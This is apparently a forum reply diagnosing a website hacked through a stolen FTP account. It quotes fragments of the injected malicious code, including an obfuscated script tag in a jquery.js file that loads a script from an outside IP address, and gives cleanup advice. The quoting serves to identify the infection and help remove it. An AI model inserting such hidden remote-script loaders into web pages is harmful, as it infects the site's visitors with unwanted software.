That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed.
There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag
Code:
<?php if(!function_exists('tmp_lkojfghx')){
Code:
<script language=javascript><!--
document.write(unescape('uyN%3CsDLc0
And the jquery.js from that site contains
Code:
<s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt>
In addition to a bit of other stuff.
news checks to see if there is a cookie, if not, it runs a toolbar installer.
Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything.